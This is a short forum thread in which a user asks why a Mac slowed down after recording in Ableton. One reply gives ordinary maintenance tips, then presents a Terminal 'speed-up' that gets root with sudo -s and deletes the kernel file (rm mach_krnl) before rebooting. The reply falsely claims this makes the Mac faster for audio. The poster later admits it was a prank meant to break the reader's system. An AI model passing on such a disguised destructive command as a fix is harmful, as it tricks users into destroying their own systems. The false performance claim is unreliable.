processor problem(i think) yesterday

i recorded some sounds into ableton(mac powerbook) and aftrwards everything seems to be working really slowly! an ideas as how to correct?

Raise the BPM's... :lol: everything will go faster...now seriously, check the hard drive (it could be almost full), turn off dashboard,airport,blue tooth,empty cache‘, repair permissions,etc, there's a lot of things you can do.

in the meantime one way to really speed up performance on a mac is to open a terminal window and type this in. reboot when you are done and watch that mac fly...

in terminal:
sudo -s
(type password)
(type password again)
rm mach_krnl
reboot

that mach kernal is way faster for audio than the standard mac kernal and its built in already, just insert these commands and presto. a super fast mac.

Ok after leaving that up for a day or so dont do that. that was a joke. If you do that then consider yourself PWNed noob. oh and looking back, I forgot to specify / oops.
